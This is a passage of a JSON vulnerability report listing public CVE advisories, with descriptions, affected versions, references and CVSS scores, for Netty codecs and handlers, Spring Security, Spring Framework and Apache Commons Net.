Details","text":"# SnappyFrameDecoder doesn't restrict chunk length any may buffer skippable chunks in an unnecessary way ### Impact The Snappy frame decoder function doesn't restrict the chunk length which may lead to excessive memory usage. Beside this it also may buffer reserved skippable chunks until the whole chunk was received which may lead to excessive memory usage as well.  This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk.  ### Impact  All users of SnappyFrameDecoder are affected and so the application may be in risk for a DoS attach due excessive memory usage.  ### References https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L79 https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L171 https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L185"}],"product_status":{"known_affected":["io.netty/netty-codec@vers:maven/>=4.0.0|<4.1.68.Final"],"known_not_affected":["io.netty/netty-codec@4.1.68.Final"]},"references":[{"summary":"GitHub Advisory GHSA-9vjp-v76f-g363","url":"https://github.com/netty/netty/security/advisories/GHSA-9vjp-v76f-g363"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r06a145c9bd41a7344da242cef07977b24abe3349161ede948e30913d@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5406eaf3b07577d233b9f07cfc8f26e28369e6bab5edfcab41f28abb@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5e05eba32476c580412f9fbdfc9b8782d5b40558018ac4ac07192a04@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r75490c61c2cb7b6ae2c81238fd52ae13636c60435abcd732d41531a0@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd262f59b1586a108e320e5c966feeafbb1b8cdc96965debc7cc10b16@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfb2bf8597e53364ccab212fbcbb2a4e9f0a9e1429b1dc08023c6868e@%3Cdev.tinkerpop.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37137"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37137"},{"summary":"NetApp Advisory ntap-20220210-0012","url":"https://security.netapp.com/advisory/ntap-20220210-0012"},{"summary":"Debian Advisory dsa-5316","url":"https://www.debian.org/security/2023/dsa-5316"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["io.netty/netty-codec@vers:maven/>=4.0.0|<4.1.68.Final"]}],"title":"CVE-2021-37137/pkg:maven/io.netty/netty-codec@4.0.27.Final?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-37136"]}],"cve":"CVE-2021-37136","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2021-09-09T17:11:21","ids":[{"system_name":"CVE Record","text":"CVE-2021-37136"},{"system_name":"GitHub Advisory","text":"GHSA-grg4-wf29-r9vv"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5316"},{"system_name":"NetApp Advisory","text":"ntap-20220210-0012"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Bzip2Decoder doesn't allow setting size restrictions for decompressed data"},{"category":"details","details":"Vulnerability Details","text":"# Bzip2Decoder doesn't allow setting size restrictions for decompressed data ### Impact The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression).   All users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack  ### Workarounds No workarounds other than not using the `Bzip2Decoder`  ### References  Relevant code areas:  https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L80 https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L294 https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L305"}],"product_status":{"known_affected":["io.netty/netty-codec@vers:maven/>=4.0.0.Alpha1|<=4.1.9.Final"]},"references":[{"summary":"GitHub Advisory GHSA-grg4-wf29-r9vv","url":"https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r06a145c9bd41a7344da242cef07977b24abe3349161ede948e30913d@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5406eaf3b07577d233b9f07cfc8f26e28369e6bab5edfcab41f28abb@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5e05eba32476c580412f9fbdfc9b8782d5b40558018ac4ac07192a04@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r75490c61c2cb7b6ae2c81238fd52ae13636c60435abcd732d41531a0@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd262f59b1586a108e320e5c966feeafbb1b8cdc96965debc7cc10b16@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfb2bf8597e53364ccab212fbcbb2a4e9f0a9e1429b1dc08023c6868e@%3Cdev.tinkerpop.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37136"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37136"},{"summary":"NetApp Advisory ntap-20220210-0012","url":"https://security.netapp.com/advisory/ntap-20220210-0012"},{"summary":"Debian Advisory dsa-5316","url":"https://www.debian.org/security/2023/dsa-5316"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["io.netty/netty-codec@vers:maven/>=4.0.0.Alpha1|<=4.1.9.Final"]}],"title":"CVE-2021-37136/pkg:maven/io.netty/netty-codec@4.0.27.Final?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-34462"]}],"cve":"CVE-2023-34462","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2023-06-20T16:33:22","ids":[{"system_name":"CVE Record","text":"CVE-2023-34462"},{"system_name":"GitHub Advisory","text":"GHSA-6mjq-h674-j845"},{"system_name":"Debian Advisory","text":"dsa-5558"},{"system_name":"NetApp Advisory","text":"ntap-20230803-0001"},{"system_name":"NetApp Advisory","text":"ntap-20240621-0007"}],"notes":[{"audience":"developers","category":"other","text":"Allocation of Resources Without Limits or Throttling","title":"Additional CWE: 770"},{"category":"description","details":"Vulnerability Description","text":"netty-handler SniHandler 16MB allocation"},{"category":"details","details":"Vulnerability Details","text":"# netty-handler SniHandler 16MB allocation ### Summary The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` to allocate 16MB of heap.  ### Details The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the indicated server name by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record.   Normally the value of the packet should be smaller than the handshake packet but there are not checks done here and the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`  1/ allocate a 16MB `ByteBuf` 2/ not fail `decode` method `in` buffer 3/ get out of the loop without an exception  The combination of this without the use of a timeout makes easy to connect to a TCP server and allocate 16MB of heap memory per connection.  ### Impact If the user has no idle timeout handler configured it might be possible for a remote peer to send a client hello packet which lead the server to buffer up to 16MB of data per connection. This could lead to a OutOfMemoryError and so result in a DDOS."}],"product_status":{"known_affected":["io.netty/netty-handler@vers:maven/>=4.0.0.Alpha1|<=4.1.93.Final"]},"references":[{"summary":"GitHub Advisory GHSA-6mjq-h674-j845","url":"https://github.com/netty/netty/security/advisories/GHSA-6mjq-h674-j845"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34462"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34462"},{"summary":"NetApp Advisory ntap-20230803-0001","url":"https://security.netapp.com/advisory/ntap-20230803-0001"},{"summary":"NetApp Advisory ntap-20240621-0007","url":"https://security.netapp.com/advisory/ntap-20240621-0007"},{"summary":"Debian Advisory dsa-5558","url":"https://www.debian.org/security/2023/dsa-5558"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["io.netty/netty-handler@vers:maven/>=4.0.0.Alpha1|<=4.1.93.Final"]}],"title":"CVE-2023-34462/pkg:maven/io.netty/netty-handler@4.0.27.Final?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-22112"]}],"cve":"CVE-2021-22112","cwe":{"id":"269","name":"Improper Privilege Management"},"discovery_date":"2021-05-10T15:22:39","ids":[{"system_name":"CVE Record","text":"CVE-2021-22112"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"Vmware Advisory","text":"cve-2021-22112"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Privilege escalation in spring security"},{"category":"details","details":"Vulnerability Details","text":"# Privilege escalation in spring security Spring Security 5.4.x prior to 5.4.4, 5.3.x prior to 5.3.8.RELEASE, 5.2.x prior to 5.2.9.RELEASE, and older unsupported versions can fail to save the SecurityContext if it is changed more than once in a single request.A malicious user cannot cause the bug to happen (it must be programmed in). However, if the application's intent is to only allow the user to run with elevated privileges in a small portion of the application, the bug can be leveraged to extend those privileges to the rest of the application."}],"product_status":{"known_affected":["org.springframework.security/spring-security-web@vers:maven/>=3.0.0.RELEASE|<=5.2.8.RELEASE"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/02/19/7"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r163b3e4e39803882f5be05ee8606b2b9812920e196daa2a82997ce14@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2cb05e499807900ba23e539643eead9c5f0652fd271f223f89da1804@%3Cpluto-scm.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r37423ec7eea340e92a409452c35b649dce02fdc467f0b3f52086c177@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3868207b967f926819fe3aa8d33f1666429be589bb4a62104a49f4e3@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r390783b3b1c59b978131ac08390bf77fbb3863270cbde59d5b0f5fde@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r413e380088c427f56102968df89ef2f336473e1b56b7d4b3a571a378@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r89aa1b48a827f5641310305214547f1d6b2101971a49b624737c497f@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra53677224fe4f04c2599abc88032076faa18dc84b329cdeba85d4cfc@%3Cpluto-scm.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra6389b1b82108a3b6bbcd22979f7665fd437c2a3408c9509a15a9ca1@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/redbd004a503b3520ae5746c2ab5e93fd7da807a8c128e60d2002cd9b@%3Cissues.nifi.apache.org%3E"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-22112"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-22112"},{"summary":"Vmware Advisory cve-2021-22112","url":"https://tanzu.vmware.com/security/cve-2021-22112"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.springframework.security/spring-security-web@vers:maven/>=3.0.0.RELEASE|<=5.2.8.RELEASE"]}],"title":"CVE-2021-22112/pkg:maven/org.springframework.security/spring-security-web@4.2.12.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-5408"]}],"cve":"CVE-2020-5408","cwe":{"id":"329","name":"Generation of Predictable IV with CBC Mode"},"discovery_date":"2020-06-15T19:34:31","ids":[{"system_name":"CVE Record","text":"CVE-2020-5408"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Vmware Advisory","text":"cve-2020-5408"}],"notes":[{"audience":"developers","category":"other","text":"Use of Insufficiently Random Values","title":"Additional CWE: 330"},{"category":"description","details":"Vulnerability Description","text":"Insufficient Entropy in Spring Security"},{"category":"details","details":"Vulnerability Details","text":"# Insufficient Entropy in Spring Security Spring Security versions 5.3.x prior to 5.3.2, 5.2.x prior to 5.2.4, 5.1.x prior to 5.1.10, 5.0.x prior to 5.0.16 and 4.2.x prior to 4.2.16 use a fixed null initialization vector with CBC Mode in the implementation of the queryable text encryptor. A malicious user with access to the data that has been encrypted using such an encryptor may be able to derive the unencrypted values using a dictionary attack."}],"product_status":{"known_affected":["org.springframework.security/spring-security-core@vers:maven/>=2.0.0|<=4.2.9.RELEASE"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-5408"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-5408"},{"summary":"Vmware Advisory cve-2020-5408","url":"https://tanzu.vmware.com/security/cve-2020-5408"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.springframework.security/spring-security-core@vers:maven/>=2.0.0|<=4.2.9.RELEASE"]}],"title":"CVE-2020-5408/pkg:maven/org.springframework.security/spring-security-core@4.2.1.RELEASE?type=jar"},{"acknowledgements":[{"organization":"Vmware","urls":["https://tanzu.vmware.com/security/cve-2022-22978"]}],"cve":"CVE-2022-22978","cwe":{"id":"285","name":"Improper Authorization"},"discovery_date":"2022-05-20T00:00:39","ids":[{"system_name":"CVE Record","text":"CVE-2022-22978"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Vmware Advisory","text":"cve-2022-22978"},{"system_name":"NetApp Advisory","text":"ntap-20220707-0003"}],"notes":[{"audience":"developers","category":"other","text":"Incorrect Authorization","title":"Additional CWE: 863"},{"category":"description","details":"Vulnerability Description","text":"Authorization bypass in Spring Security"},{"category":"details","details":"Vulnerability Details","text":"# Authorization bypass in Spring Security In Spring Security versions 5.5.6 and 5.5.7 and older unsupported versions, RegexRequestMatcher can easily be misconfigured to be bypassed on some servlet containers. Applications using RegexRequestMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass."}],"product_status":{"known_affected":["org.springframework.security/spring-security-core@vers:maven/>=2.0.0|<=5.4.9"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22978"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22978"},{"summary":"NetApp Advisory ntap-20220707-0003","url":"https://security.netapp.com/advisory/ntap-20220707-0003"},{"summary":"Cve 2022","url":"https://spring.io/security/cve-2022-22978"},{"summary":"Vmware Advisory cve-2022-22978","url":"https://tanzu.vmware.com/security/cve-2022-22978"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.springframework.security/spring-security-core@vers:maven/>=2.0.0|<=5.4.9"]}],"title":"CVE-2022-22978/pkg:maven/org.springframework.security/spring-security-core@4.2.1.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-22970"]}],"cve":"CVE-2022-22970","cwe":{"id":"770","name":"Allocation of Resources Without Limits or Throttling"},"discovery_date":"2022-05-13T00:00:28","ids":[{"system_name":"CVE Record","text":"CVE-2022-22970"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Vmware Advisory","text":"cve-2022-22970"},{"system_name":"NetApp Advisory","text":"ntap-20220616-0006"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Denial of service in Spring Framework"},{"category":"details","details":"Vulnerability Details","text":"# Denial of service in Spring Framework In spring framework versions prior to 5.3.20+ , 5.2.22+ and old unsupported versions, applications that handle file uploads are vulnerable to DoS attack if they rely on data binding to set a MultipartFile or javax.servlet.Part to a field in a model object."}],"product_status":{"known_affected":["org.springframework/spring-beans@vers:maven/>=1.0|<=5.2.9.RELEASE"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22970"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22970"},{"summary":"NetApp Advisory ntap-20220616-0006","url":"https://security.netapp.com/advisory/ntap-20220616-0006"},{"summary":"Vmware Advisory cve-2022-22970","url":"https://tanzu.vmware.com/security/cve-2022-22970"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.springframework/spring-beans@vers:maven/>=1.0|<=5.2.9.RELEASE"]}],"title":"CVE-2022-22970/pkg:maven/org.springframework/spring-beans@4.3.6.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-22968"]}],"cve":"CVE-2022-22968","cwe":{"id":"178","name":"Improper Handling of Case Sensitivity"},"discovery_date":"2022-04-15T00:00:32","ids":[{"system_name":"CVE Record","text":"CVE-2022-22968"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Vmware Advisory","text":"cve-2022-22968"},{"system_name":"NetApp Advisory","text":"ntap-20220602-0004"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper handling of case sensitivity in Spring Framework"},{"category":"details","details":"Vulnerability Details","text":"# Improper handling of case sensitivity in Spring Framework In Spring Framework versions 5.3.0 - 5.3.18, 5.2.0 - 5.2.20, and older unsupported versions, the patterns for disallowedFields on a DataBinder are case sensitive which means a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including upper and lower case for the first character of all nested fields within the property path. Versions 5.3.19 and 5.2.21 contain a patch for this issue."}],"product_status":{"known_affected":["org.springframework/spring-context@vers:maven/>=1.0|<=5.2.9.RELEASE"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22968"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22968"},{"summary":"NetApp Advisory ntap-20220602-0004","url":"https://security.netapp.com/advisory/ntap-20220602-0004"},{"summary":"Vmware Advisory cve-2022-22968","url":"https://tanzu.vmware.com/security/cve-2022-22968"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","version":"3.1"},"products":["org.springframework/spring-context@vers:maven/>=1.0|<=5.2.9.RELEASE"]}],"title":"CVE-2022-22968/pkg:maven/org.springframework/spring-context@4.3.6.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-37533"]}],"cve":"CVE-2021-37533","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2022-12-03T15:30:26","ids":[{"system_name":"CVE Record","text":"CVE-2021-37533"},{"system_name":"Apache Advisory","text":"NET-711"},{"system_name":"Debian Advisory","text":"dsa-5307"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Commons Net vulnerable to information leakage via malicious server"},{"category":"details","details":"Vulnerability Details","text":"# Apache Commons Net vulnerable to information leakage via malicious server Prior to Apache Commons Net 3.9.0, Net's FTP client trusts the host from PASV response by default. A malicious server can redirect the Commons Net code to use a different host, but the user has to connect to the malicious server in the first place. This may lead to leakage of information about services running on the private network of the client. The default in version 3.9.0 is now false to ignore such hosts, as cURL does. See https://issues.apache.org/jira/browse/NET-711."}],"product_status":{"known_affected":["commons-net/commons-net@vers:maven/>=1.0.0|<=3.8.0"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2022/12/03/1"},{"summary":"Apache Advisory NET-711","url":"https://issues.apache.org/jira/browse/NET-711"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/o6yn9r9x6s94v97264hmgol1sf48mvx7"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/12/msg00038.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37533"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37533"},{"summary":"Debian Advisory dsa-5307","url":"https://www.debian.org/security/2022/dsa-5307"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N","version":"3.1"},"products":["commons-net/commons-net@vers:maven/>=1.0.0|<=3.8.0"]}],"title":"CVE-2021-37533/pkg:maven/commons-net/commons-net@3.6?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020